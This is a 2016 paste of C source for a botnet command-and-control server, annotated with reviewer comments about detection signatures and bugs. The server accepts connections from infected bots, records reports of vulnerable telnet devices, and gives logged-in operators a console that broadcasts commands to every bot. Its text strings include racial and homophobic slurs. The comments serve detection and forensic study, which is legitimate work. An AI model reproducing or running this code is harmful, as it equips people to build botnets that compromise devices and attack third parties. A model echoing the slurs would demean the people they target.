
Untitled

a guest
Dec 10th, 2016
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <sys/types.h>
  5. #include <sys/socket.h>
  6. #include <netdb.h>
  7. #include <unistd.h>
  8. #include <time.h>
  9. #include <fcntl.h>
  10. #include <sys/epoll.h>
  11. #include <errno.h>
  12. #include <pthread.h>
  13. #include <signal.h>
  14.  
  15. ////////////////////////////////////
      // TCP port for the operator ("management") listener; telnetListener() binds
      // a stream socket to it. An interactive text login on TCP/53 is not DNS
      // traffic, which makes it a useful network detection signal.
  16. #define MY_MGM_PORT 53
      // Number of slots in the fd-indexed clients[] and managements[] tables.
  17. #define MAXFDS 1000000
  18. ////////////////////////////////////
  19.  
  20.  
  /* One operator credential pair. telnetWorker() fills these from login.txt
   * with fscanf("%s %s") and checks them with strcmp(), so credentials are
   * held and compared in plaintext. */
  21. struct account {
  22. char id[20]; // operator name; written by a "%s" conversion with no field width
  23. char password[20]; // plaintext password; same unbounded "%s" write
  24. };
  25. static struct account accounts[10]; // fixed 10-entry table shared by every operator thread
  26.  
  /* Per-client state, indexed directly by the connection's file descriptor. */
  27. struct clientdata_t {
  28. uint32_t ip; // sin_addr.s_addr taken from accept() in epollEventLoop(); used for the duplicate-IP check
  29. char build[7]; // value from a "BUILD ..." message; copied in with strcpy()
  30. char connected; // non-zero while the fd is treated as a live client
  31. } clients[MAXFDS];
  32.  
  /* Per-operator state, also indexed by file descriptor. */
  33. struct telnetdata_t {
  34. int connected; // set to 1 by telnetWorker() after a successful login, cleared on exit
  35. } managements[MAXFDS];
  36.  
  37.  
  38.  
  39. ////////////////////////////////////
  40.  
  41.  
  /* Process-wide state shared by the event-loop threads and the operator
   * threads. NOTE(review): these are only marked volatile; no lock or atomic
   * operation is visible in this listing, so the ++/-- updates below can race. */
  42. static volatile FILE *telFD; // opened in main() as "telnet.txt" (append); REPORT lines are written here
  43. static volatile FILE *fileFD; // not referenced anywhere else in this listing
  44. static volatile int epollFD = 0; // epoll instance created in main(), waited on by every epollEventLoop thread
  45. static volatile int listenFD = 0; // client listener socket from create_and_bind()
  46. static volatile int managesConnected = 0; // operator sessions; incremented on entry to telnetWorker()
  47. static volatile int TELFound = 0; // number of REPORT messages received
  48. static volatile int scannerreport; // set to 1 on "SCANNER STARTED!", decremented on "SCANNER STOPPED!"
  49.  
  50.  
  51. ////////////////////////////////////
  52.  
  53.  
  /*
   * Read from fd one byte at a time into buffer until a '\n' has been stored,
   * bufferSize bytes have been stored, or read() returns something other
   * than 1.
   *
   * Returns the result of the last read() call (1, 0 at end of stream, -1 on
   * error), not the number of bytes read. No terminator is written; the
   * callers in this file zero the buffer beforehand.
   *
   * NOTE(review): on the first pass total is 0, so the loop condition reads
   * buffer[-1], one byte before the caller's buffer. A line of bufferSize
   * bytes with no newline also fills the buffer completely, leaving no NUL
   * for the string functions the callers apply afterwards.
   */
  54. int fdgets(unsigned char *buffer, int bufferSize, int fd)
  55. {
  56. int total = 0, got = 1;
  57. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
  58. return got;
  59. }
  60.  
  /*
   * Strip leading and trailing whitespace from str in place by shifting the
   * remaining characters to the front and writing a new terminator.
   *
   * NOTE(review): isspace() is declared in <ctype.h>, which is not among the
   * headers included at the top of this listing, and it is called here with a
   * plain char; a negative char value is outside the range isspace() accepts.
   */
  61. void trim(char *str) // Remove whitespace from a string and properly null-terminate it.
  62. {
  63. int i;
  64. int begin = 0;
  65. int end = strlen(str) - 1; // -1 for an empty string; the loops below then do nothing
  66. while (isspace(str[begin])) begin++;
  67. while ((end >= begin) && isspace(str[end])) end--;
  68. for (i = begin; i <= end; i++) str[i - begin] = str[i];
  69. str[i - begin] = '\0';
  70. }
  71.  
  72.  
  /*
   * Add O_NONBLOCK to the file status flags of sfd.
   * Returns 0 on success, or -1 after printing the fcntl() error with perror().
   */
  73. static int make_socket_non_blocking (int sfd)
  74. {
  75. int flags, s;
  76. flags = fcntl (sfd, F_GETFL, 0); // read the current flags so only O_NONBLOCK is added
  77. if (flags == -1)
  78. {
  79. perror ("fcntl");
  80. return -1;
  81. }
  82. flags |= O_NONBLOCK;
  83. s = fcntl (sfd, F_SETFL, flags);
  84. if (s == -1)
  85. {
  86. perror ("fcntl");
  87. return -1;
  88. }
  89. return 0;
  90. }
  91.  
  92.  
  /*
   * Create a TCP socket bound to `port` on all interfaces. Candidate addresses
   * come from getaddrinfo() with AI_PASSIVE and AF_UNSPEC, and the first one
   * that binds is used. The socket is returned bound but not yet listening.
   *
   * Returns the socket descriptor, or -1 if resolution or every bind fails.
   *
   * NOTE(review): the "Could not bind" path returns without calling
   * freeaddrinfo(), and a setsockopt() failure is only reported, not acted on.
   */
  93. static int create_and_bind (char *port)
  94. {
  95. struct addrinfo hints;
  96. struct addrinfo *result, *rp;
  97. int s, sfd;
  98. memset (&hints, 0, sizeof (struct addrinfo));
  99. hints.ai_family = AF_UNSPEC; /* Return IPv4 and IPv6 choices */
  100. hints.ai_socktype = SOCK_STREAM; /* We want a TCP socket */
  101. hints.ai_flags = AI_PASSIVE; /* All interfaces */
  102. s = getaddrinfo (NULL, port, &hints, &result);
  103. if (s != 0)
  104. {
  105. fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (s));
  106. return -1;
  107. }
  108. for (rp = result; rp != NULL; rp = rp->ai_next)
  109. {
  110. sfd = socket (rp->ai_family, rp->ai_socktype, rp->ai_protocol);
  111. if (sfd == -1) continue;
  112. int yes = 1;
  113. if ( setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1 ) perror("setsockopt");
  114. s = bind (sfd, rp->ai_addr, rp->ai_addrlen);
  115. if (s == 0)
  116. {
  117. break;
  118. }
  119. close (sfd); // this candidate failed to bind; try the next address
  120. }
  121. if (rp == NULL) // loop ran off the end of the list: nothing bound
  122. {
  123. fprintf (stderr, "Could not bind\n");
  124. return -1;
  125. }
  126. freeaddrinfo (result);
  127. return sfd;
  128. }
  129.  
  /*
   * Send msg to every fd marked connected in clients[], except `us`. Unless
   * msg is exactly "PING", it is also echoed to every logged-in operator fd,
   * preceded by a coloured timestamp and followed by the shell-style prompt.
   *
   * On the wire a client receives msg, "\r\n", then "\n"; for the keep-alive
   * sent from main() that is "PING\r\n\n" once a minute, which is a usable
   * traffic signature.
   *
   * NOTE(review): `wot` is allocated (unchecked), filled and trimmed but never
   * sent. localtime()/asctime() return static storage and this function is
   * called from several threads. The lengths 6 and 8 passed with the two
   * colour strings are one more than their visible characters, so the
   * terminating NUL is transmitted as well.
   */
  130. void broadcast(char *msg, int us) // sends message to all bots, notifies the management clients of this happening
  131. {
  132. int sendMGM = 1;
  133. if(strcmp(msg, "PING") == 0) sendMGM = 0; // Don't send pings to management. Why? Because a human is going to ignore it.
  134. char *wot = malloc(strlen(msg) + 10);
  135. memset(wot, 0, strlen(msg) + 10);
  136. strcpy(wot, msg);
  137. trim(wot);
  138. time_t rawtime;
  139. struct tm * timeinfo;
  140. time(&rawtime);
  141. timeinfo = localtime(&rawtime);
  142. char *timestamp = asctime(timeinfo);
  143. trim(timestamp); // drops the trailing newline asctime() appends
  144. int i;
  145. for(i = 0; i < MAXFDS; i++) // walks all MAXFDS slots on every call
  146. {
      // skip the sender, and any slot that is neither a connected client nor
      // (for non-PING messages) a logged-in operator
  147. if(i == us || (!clients[i].connected && (sendMGM == 0 || !managements[i].connected))) continue;
  148. if(sendMGM && managements[i].connected)
  149. {
  150. send(i, "\r\n", 2, MSG_NOSIGNAL);
  151. send(i, "\x1b[34m", 6, MSG_NOSIGNAL);
  152. send(i, timestamp, strlen(timestamp), MSG_NOSIGNAL);
  153. send(i, ":\x1b[37m ", 8, MSG_NOSIGNAL);
  154. } //just a prompt with a timestamp.
  155. printf("sent to fd: %d\n", i);
  156. send(i, msg, strlen(msg), MSG_NOSIGNAL);
  157. send(i, "\r\n", 2, MSG_NOSIGNAL);
  158. if(sendMGM && managements[i].connected) send(i, "[r00t@r4p3 ~]# ", 15, MSG_NOSIGNAL); // re-issue the prompt on operator sessions
  159. else send(i, "\n", 1, MSG_NOSIGNAL);
  160. }
  161. free(wot);
  162. }
  163.  
  /*
   * Event-loop thread body (started from main()). Blocks in epoll_wait() on
   * the shared epollFD and handles three cases per event: error/hangup, new
   * connections on listenFD, and newline-terminated text messages from an
   * already-registered client. Runs forever; `useless` is ignored.
   *
   * Client messages recognised below (plain text, compared after trim()):
   *   "PING"                                  -> answered with "PONG\n"
   *   "BUILD ..."                             -> stored in clients[fd].build
   *   "REPORT ..."                            -> remainder appended to telFD
   *   "SCANNER STARTED!" / "SCANNER STOPPED!" -> adjust scannerreport
   *   "PONG"                                  -> ignored
   * Anything else is printed to stdout. These fixed strings, together with
   * the "!* SCANNER ON\n" greeting sent to each accepted connection, are
   * stable indicators for network signatures.
   */
  164. void *epollEventLoop(void *useless)
  165. {
  166. struct epoll_event event;
  167. struct epoll_event *events;
  168. int s;
  169. events = calloc (MAXFDS, sizeof event); // NOTE(review): result is not checked before use
  170. while (1)
  171. {
  172. int n, i;
  173. n = epoll_wait (epollFD, events, MAXFDS, -1);
  174. for (i = 0; i < n; i++)
  175. {
      // Error, hangup, or an event without EPOLLIN: drop the descriptor.
      // The fd is used as an index into clients[] with no range check.
  176. if ((events[i].events & EPOLLERR) || (events[i].events & EPOLLHUP) || (!(events[i].events & EPOLLIN)))
  177. {
  178. clients[events[i].data.fd].connected = 0;
  179. close(events[i].data.fd);
  180. continue;
  181. }
  182. else if (listenFD == events[i].data.fd)
  183. {
      // The listener is registered edge-triggered, so accept in a loop
      // until accept() reports there is nothing left.
  184. while (1)
  185. {
  186. struct sockaddr in_addr;
  187. socklen_t in_len;
  188. int infd, ipIndex;
  189.  
  190. in_len = sizeof in_addr;
  191. infd = accept (listenFD, &in_addr, &in_len); // accept a connection from a bot.
  192. if (infd == -1)
  193. {
  194. if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break;
  195. else
  196. {
  197. perror ("accept");
  198. break;
  199. }
  200. }
  201.  
      // NOTE(review): the address is read as sockaddr_in regardless of family;
      // create_and_bind() asks for AF_UNSPEC, so if the listener ended up on an
      // IPv6 address this field would not be the peer's IPv4 address — confirm.
  202. clients[infd].ip = ((struct sockaddr_in *)&in_addr)->sin_addr.s_addr;
  203.  
  204. int dup = 0;
  205. for(ipIndex = 0; ipIndex < MAXFDS; ipIndex++) // check for duplicate clients by seeing if any have the same IP as the one connecting
  206. {
  207. if(!clients[ipIndex].connected || ipIndex == infd) continue;
  208.  
  209. if(clients[ipIndex].ip == clients[infd].ip)
  210. {
  211. dup = 1;
  212. break;
  213. }
  214. }
  215.  
      // Only one connection per source address is kept. A rejected duplicate
      // is sent the two fixed strings below and then closed; both literals are
      // constant and can serve as network signatures.
  216. if(dup)
  217. {
  218. printf("DUP Client - Terminating\n"); // warns the operator on command line
  219. if(send(infd, "!* QWAPKVTAYMEEB\n", 17, MSG_NOSIGNAL) == -1) { close(infd); continue; }
  220. if(send(infd, "NIGGERDUP\n", 10, MSG_NOSIGNAL) == -1) { close(infd); continue; }
  221. close(infd);
  222. continue;
  223. }
  224.  
  225. s = make_socket_non_blocking (infd);
  226. if (s == -1) { close(infd); break; }
  227.  
  228. event.data.fd = infd;
  229. event.events = EPOLLIN | EPOLLET;
  230. s = epoll_ctl (epollFD, EPOLL_CTL_ADD, infd, &event);
  231. if (s == -1)
  232. {
  233. perror ("epoll_ctl");
  234. close(infd);
  235. break;
  236. }
  237.  
      // Registered: mark the slot live and send the fixed greeting string.
  238. clients[infd].connected = 1;
  239. send(infd, "!* SCANNER ON\n", 14, MSG_NOSIGNAL);
  240. }
  241. continue;
  242. }
  243. else
  244. {
      // Data from an existing client connection.
  245. int thefd = events[i].data.fd;
  246. struct clientdata_t *client = &(clients[thefd]);
  247. int done = 0;
  248. client->connected = 1;
  249. while (1)
  250. {
  251. ssize_t count;
  252. char buf[2048];
  253. memset(buf, 0, sizeof buf);
  254.  
      // One line per iteration; buf is re-zeroed before each fdgets() call.
      // count receives fdgets()'s return value, i.e. the last read() result.
  255. while(memset(buf, 0, sizeof buf) && (count = fdgets(buf, sizeof buf, thefd)) > 0)
  256. {
  257. if(strstr(buf, "\n") == NULL) { done = 1; break; } // no newline in what was read: drop the client
  258. trim(buf);
  259. if(strcmp(buf, "PING") == 0) // basic IRC-like ping/pong challenge/response to see if server is alive
  260. {
  261. if(send(thefd, "PONG\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // response
  262. continue;
  263. }
  264. if(strstr(buf, "BUILD ") == buf)
  265. {
      // NOTE(review): "BUILD " is 6 characters but the pointer is advanced
      // by 7. The length check lets a 7-character value through, and
      // strcpy() then writes 8 bytes (value plus NUL) into the 7-byte
      // build field.
  266. char *build = strstr(buf, "BUILD ") + 7;
  267. if(strlen(build) > 7) { printf("build bigger then 6\n"); done = 1; break; }
  268. memset(client->build, 0, 7);
  269. strcpy(client->build, build);
  270. continue;
  271. }
  272. if(strstr(buf, "REPORT ") == buf) // received a report of a vulnerable system from a scan
  273. {
      // The text after "REPORT " is appended to telnet.txt exactly as
      // received. telFD comes from an unchecked fopen() in main().
  274. char *line = strstr(buf, "REPORT ") + 7;
  275. fprintf(telFD, "%s\n", line); // let's write it out to disk without checking what it is!
  276. fflush(telFD);
  277. TELFound++;
  278. continue;
  279. }
  280. if(strstr(buf, "SCANNER STARTED!") == buf)
  281. {
  282. char *line = strstr(buf, "SCANNER STARTED!"); // unused
  283. scannerreport = 1; // assigned, not incremented, while STOPPED decrements below
  284. continue;
  285. }
  286. if(strstr(buf, "SCANNER STOPPED!") == buf)
  287. {
  288. char *line = strstr(buf, "SCANNER STOPPED!"); // unused
  289. scannerreport--;
  290. continue;
  291. }
  292. if(strcmp(buf, "PONG") == 0)
  293. {
  294. //should really add some checking or something but meh
  295. continue;
  296. }
  297.  
  298. printf("buf: \"%s\"\n", buf); // unrecognised line: echoed to the server's stdout
  299. }
  300.  
  301. if (count == -1)
  302. {
  303. if (errno != EAGAIN) // EAGAIN only means the socket is drained for now
  304. {
  305. done = 1;
  306. }
  307. break;
  308. }
  309. else if (count == 0) // peer closed the connection
  310. {
  311. done = 1;
  312. break;
  313. }
  314. }
  315.  
  316. if (done)
  317. {
  318. client->connected = 0;
  319. close(thefd);
  320. }
  321. }
  322. }
  323. }
  324. }
  325.  
  /*
   * Return how many slots in clients[] are currently marked connected.
   * Every call scans all MAXFDS slots; titleWriter() calls it every two
   * seconds for each operator session.
   */
  326. unsigned int clientsConnected() // counts the number of bots
  327. {
  328. int i = 0, total = 0;
  329. for(i = 0; i < MAXFDS; i++)
  330. {
  331. if(!clients[i].connected) continue;
  332. total++;
  333. }
  334. return total;
  335. }
  336.  
  /*
   * Thread body started by telnetWorker() after a successful login. Every two
   * seconds it sends a terminal escape sequence (ESC ]0; ... BEL) carrying the
   * client and operator counts to the operator's socket, and stops when
   * send() fails. The recurring "Bots connected: N | Operators: N" sequence
   * is a recognisable pattern on an operator session.
   *
   * `sock` is the socket descriptor carried in the pointer argument.
   * NOTE(review): the bare `return;` yields no value from a void * function.
   */
  337. void *titleWriter(void *sock) // Information in the window title ya know
  338. {
  339. int thefd = (int)sock;
  340. char string[2048];
  341. while(1)
  342. {
  343. memset(string, 0, 2048);
  344. sprintf(string, "%c]0;Bots connected: %d | Operators: %d%c", '\033', clientsConnected(), managesConnected, '\007');
  345. if(send(thefd, string, strlen(string), MSG_NOSIGNAL) == -1) return;
  346.  
  347. sleep(2);
  348. }
  349. }
  350.  
  /*
   * Scan login.txt for lines that contain str as a substring.
   *
   * Returns the zero-based index of the last matching line, 0 when nothing
   * matches, or -1 when the file cannot be opened.
   *
   * NOTE(review): "no match" and "match on the first line" both return 0, and
   * the caller uses the result, including -1, directly as an index into
   * accounts[]. Matching is by substring of the whole line, so it can hit on
   * the password column as well as the id.
   */
  351. int Search_in_File(char *str)
  352. {
  353. FILE *fp;
  354. int line_num = 0;
  355. int find_result = 0, find_line=0;
  356. char temp[512];
  357.  
  358. if((fp = fopen("login.txt", "r")) == NULL){
  359. return(-1);
  360. }
  361. while(fgets(temp, 512, fp) != NULL){
  362. if((strstr(temp, str)) != NULL){
  363. find_result++;
  364. find_line = line_num; // later matches overwrite earlier ones
  365. }
  366. line_num++;
  367. }
  368. if(fp)
  369. fclose(fp);
  370.  
  371. if(find_result == 0)return 0;
  372.  
  373. return find_line;
  374. }
  375.  
  /*
   * Per-connection thread for an operator session on the management port.
   * Loads login.txt into accounts[], prompts for a nickname and a password,
   * and on success relays every non-empty input line to all connected clients
   * through broadcast(), after printing it to stdout and appending it to
   * server.log.
   *
   * Files touched (relative to the working directory), relevant when
   * examining a seized host: login.txt ("id password" pairs in plaintext) and
   * server.log (one line per operator input, prefixed with the account id).
   *
   * NOTE(review): declared with two parameters, but telnetListener() hands it
   * to pthread_create(), which calls a start routine with one argument; the
   * second parameter is never used in the body. The function also falls off
   * the end, and uses bare `return;`, without returning a value.
   */
  376. void *telnetWorker(void *sock, void *telnetListener)
  377. {
  378. int thefd = (int)sock;
  379. int find_line;
  380. managesConnected++;
  381. pthread_t title;
  382. char counter[2048];
  383. memset(counter, 0, 2048);
  384. char buf[2048];
  385. char* nickstring;
  386. char* username;
  387. char* password;
  388. memset(buf, 0, sizeof buf);
  389. char botnet[2048];
  390. memset(botnet, 0, 2048);
  391.  
      // Load the credential file into the shared accounts[] table.
      // NOTE(review): fopen() is not checked and fp is never closed. The first
      // loop counts characters, not lines, so fscanf() is attempted once per
      // character of the file; calls after the data runs out store nothing,
      // but more than 10 pairs, or a token of 20 or more characters, writes
      // past the fixed-size fields.
  392. //GET ACCOUNTS FROM FILE AND GIVE THEM IDS
  393. FILE *fp;
  394. int i=0;
  395. int c;
  396. fp=fopen("login.txt", "r");
  397. while(!feof(fp))
  398. {
  399. c=fgetc(fp);
  400. ++i;
  401. }
  402. int j=0;
  403. rewind(fp);
  404. while(j!=i-1)
  405. {
  406. fscanf(fp, "%s %s", accounts[j].id, accounts[j].password);
  407. ++j;
  408. }
  409. //END FILE LOADING
  410.  
      // Login dialogue. NOTE(review): several send() calls in this function pass
      // a length larger than the literal as it is rendered in this listing (for
      // example 5 for the 4-character "\033[1A"); if the rendering is faithful,
      // bytes beyond the literal are transmitted too.
  411. if(send(thefd, "\x1b[32mNickname:\x1b[30m ", 22, MSG_NOSIGNAL) == -1) goto end;
  412. if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
  413. trim(buf);
  414. nickstring = ("%s", buf); // comma expression: nickstring simply points at buf
  415. find_line = Search_in_File(nickstring);
  416. if(strcmp(nickstring, accounts[find_line].id) == 0){ // find_line may be -1 here (login.txt unreadable)
  417. if(send(thefd, "\x1b[31m****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  418. if(send(thefd, "\x1b[32m* VALID USERNAME *\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  419. if(send(thefd, "\x1b[32mPassword:\x1b[30m ", 22, MSG_NOSIGNAL) == -1) goto end;
  420. if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
  421. trim(buf);
  422. if(strcmp(buf, accounts[find_line].password) != 0) goto failed; // plaintext comparison
  423. memset(buf, 0, 2048);
  424. goto fak;
  425. }
      // Unknown nickname or wrong password: show the rejection banner, wait
      // five seconds, then close the session.
  426. failed:
  427. if(send(thefd, "\033[1A", 5, MSG_NOSIGNAL) == -1) goto end;
  428. if(send(thefd, "\x1b[31m****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  429. if(send(thefd, "\x1b[31m* INVALID CREDENTIALS *\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  430. if(send(thefd, "\x1b[31m* FUCK OFF FAGGOT, LOGGED *\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  431. if(send(thefd, "\x1b[31m****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  432. sleep(5);
  433. goto end;
      // Authenticated: send the welcome banner, start the title-updater thread
      // and mark this fd as an operator so broadcast() echoes to it.
  434. fak:
  435. if(send(thefd, "\033[1A", 5, MSG_NOSIGNAL) == -1) goto end;
  436. if(send(thefd, "\x1b[1m\x1b[36m****************************************\r\n", 54, MSG_NOSIGNAL) == -1) goto end;
  437. if(send(thefd, "* \x1b[37mWELCOME TO THE R4P3R\x1b[36m *\r\n", 54, MSG_NOSIGNAL) == -1) goto end;
  438. if(send(thefd, "* \x1b[37m\x1b[31mIn the FBI we trust\x1b[31m\x1b[36m *\r\n", 74, MSG_NOSIGNAL) == -1) goto end;
  439. if(send(thefd, "* \x1b[37m\x1b[31mNow with Ceiling Fan support\x1b[31m\x1b[36m *\r\n", 74, MSG_NOSIGNAL) == -1) goto end;
  440. if(send(thefd, "******************************\r\n\x1b[36m\x1b[37m", 43, MSG_NOSIGNAL) == -1) goto end;
  441. pthread_create(&title, NULL, &titleWriter, sock);
  442. managements[thefd].connected = 1;
  443.  
      // botnet is still all zeroes here, so this send() carries no data. The
      // `return` paths below skip the cleanup at `end:`.
  444. if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return;
  445.  
  446. if(send(thefd, "\r\n[r00t@r4p3 ~]# ", 17, MSG_NOSIGNAL) == -1) goto end;
      // Command loop: one operator input line per iteration.
  447. while(fdgets(buf, sizeof buf, thefd) > 0)
  448. {
      // "!* STATUS" and "!* BOTS" are answered locally with counters. There is
      // no `continue` after them, so the same line is still logged and
      // broadcast below.
  449. if(strstr(buf, "!* STATUS"))
  450. {
  451. sprintf(botnet, "Telnet Devices: %d | Telnet Status: %d\r\n", TELFound, scannerreport);
  452. if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return;
  453. }
  454. if(strstr(buf, "!* BOTS"))
  455. {
  456. sprintf(botnet, "Bots connected: %d | Operators: %d\r\n", clientsConnected(), managesConnected);
  457. if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return;
  458. }
  459. trim(buf);
  460. if(send(thefd, "[r00t@r4p3 ~]# ", 15, MSG_NOSIGNAL) == -1) goto end;
  461. if(strlen(buf) == 0) continue;
      // Audit trail: each non-empty line goes to stdout and server.log as
      // <account id>: "<line>" before it is relayed.
      // NOTE(review): the fopen() result is not checked.
  462. printf("%s: \"%s\"\n",accounts[find_line].id, buf);
  463. FILE *logFile;
  464. logFile = fopen("server.log", "a");
  465. fprintf(logFile, "%s: \"%s\"\n",accounts[find_line].id, buf);
  466. fclose(logFile);
  467. broadcast(buf, thefd);
  468. memset(buf, 0, 2048);
  469. }
  470.  
  471. end: // cleanup dead socket
  472. managements[thefd].connected = 0;
  473. close(thefd);
  474. managesConnected--;
  475. }
  476.  
  /*
   * Thread body for the operator listener. Binds an IPv4 TCP socket to
   * INADDR_ANY on MY_MGM_PORT, then accepts connections forever and starts
   * one telnetWorker thread per connection, passing the socket descriptor in
   * the pointer argument. `useless` is ignored.
   *
   * NOTE(review): socket(), bind() and accept() failures are only reported
   * with perror() and execution continues, so a worker can be started on a
   * negative descriptor; listen() and pthread_create() results are not
   * checked. Binding a port below 1024 normally requires elevated privilege.
   */
  477. void *telnetListener(void *useless)
  478. {
  479. int sockfd, newsockfd;
  480. socklen_t clilen;
  481. struct sockaddr_in serv_addr, cli_addr;
  482. sockfd = socket(AF_INET, SOCK_STREAM, 0);
  483. if (sockfd < 0) perror("ERROR opening socket");
  484. bzero((char *) &serv_addr, sizeof(serv_addr));
  485. serv_addr.sin_family = AF_INET;
  486. serv_addr.sin_addr.s_addr = INADDR_ANY; // all local interfaces
  487. serv_addr.sin_port = htons(MY_MGM_PORT);
  488. if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) perror("ERROR on binding");
  489. listen(sockfd,5);
  490. clilen = sizeof(cli_addr); // set once; not reset before each accept()
  491. while(1)
  492. {
  493. newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
  494. if (newsockfd < 0) perror("ERROR on accept");
  495. pthread_t thread;
  496. int a=pthread_create(&thread,NULL,&telnetWorker,(void *)newsockfd); // thread is neither joined nor detached here
  497. }
  498. }
  499.  
  /*
   * Entry point. Usage: <program> [port] [threads].
   *
   * Opens telnet.txt for appending, creates the non-blocking client listener
   * on argv[1], registers it with a new epoll instance, starts argv[2]
   * event-loop threads plus the operator listener thread, and then sends
   * "PING" to every connected client once a minute from the main thread.
   *
   * Observable artefacts: telnet.txt in the working directory, a TCP listener
   * on the chosen port, a second TCP listener on MY_MGM_PORT, and a 60-second
   * keep-alive toward every connected client.
   *
   * NOTE(review): the third parameter `sock` is never used. The fopen()
   * result is not checked, and the atoi() result is used unvalidated as both
   * an array size and a loop count.
   */
  500. int main (int argc, char *argv[], void *sock)
  501. {
  502. signal(SIGPIPE, SIG_IGN); // ignore broken pipe errors sent from kernel
  503.  
  504. int s, threads;
  505. struct epoll_event event;
  506.  
  507. if (argc != 3)
  508. {
  509. fprintf (stderr, "Usage: %s [port] [threads]\n", argv[0]);
  510. exit (EXIT_FAILURE);
  511. }
  512. telFD = fopen("telnet.txt", "a+"); // destination for REPORT lines written in epollEventLoop()
  513. threads = atoi(argv[2]);
  514.  
  515. listenFD = create_and_bind (argv[1]); // try to create a listening socket, die if we can't
  516. if (listenFD == -1) abort ();
  517.  
  518. s = make_socket_non_blocking (listenFD); // try to make it nonblocking, die if we can't
  519. if (s == -1) abort ();
  520.  
  521. s = listen (listenFD, SOMAXCONN); // listen with a huuuuge backlog, die if we can't
  522. if (s == -1)
  523. {
  524. perror ("listen");
  525. abort ();
  526. }
  527.  
  528. epollFD = epoll_create1 (0); // make an epoll listener, die if we can't
  529. if (epollFD == -1)
  530. {
  531. perror ("epoll_create");
  532. abort ();
  533. }
  534.  
  535. event.data.fd = listenFD;
  536. event.events = EPOLLIN | EPOLLET; // edge-triggered: the accept loop must drain the queue
  537. s = epoll_ctl (epollFD, EPOLL_CTL_ADD, listenFD, &event);
  538. if (s == -1)
  539. {
  540. perror ("epoll_ctl");
  541. abort ();
  542. }
  543.  
  544. pthread_t thread[threads + 2]; // variable-length array sized from the command line
  545. while(threads--)
  546. {
  547. pthread_create( &thread[threads + 1], NULL, &epollEventLoop, (void *) NULL); // start one event-loop worker; all workers wait on the same epollFD
  548. }
  549.  
  550. pthread_create(&thread[0], NULL, &telnetListener, (void *)NULL); // operator listener on MY_MGM_PORT
  551.  
  552. while(1)
  553. {
  554. broadcast("PING", -1); // ping bots every 60 sec on the main thread
  555. sleep(60);
  556. }
  557.  
      // Not reached: the loop above never exits.
  558. close (listenFD);
  559.  
  560. return EXIT_SUCCESS;
  561. }